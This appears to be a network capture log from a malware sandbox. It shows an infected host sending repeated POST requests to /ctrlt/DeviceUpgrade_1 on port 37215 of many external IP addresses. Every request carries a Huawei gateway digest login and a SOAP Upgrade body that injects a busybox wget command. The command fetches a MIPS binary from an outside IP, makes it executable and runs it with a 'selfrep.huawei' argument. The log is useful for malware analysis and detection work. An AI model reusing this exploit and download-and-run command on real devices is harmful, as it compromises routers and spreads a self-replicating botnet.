                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          741192.168.2.2354972157.3.21.21437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225989103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          742192.168.2.233367067.55.61.24837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229018927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          743192.168.2.2335880197.84.188.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229038954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          744192.168.2.2347204197.137.229.16637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229038954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          745192.168.2.2334986211.29.50.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229121923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          746192.168.2.2341878197.62.156.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229219913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          747192.168.2.2344160157.37.55.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229408026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          748192.168.2.2358308157.30.113.2937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229424953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          749192.168.2.2346054197.217.162.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229481936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          750192.168.2.236037035.168.56.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229486942 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
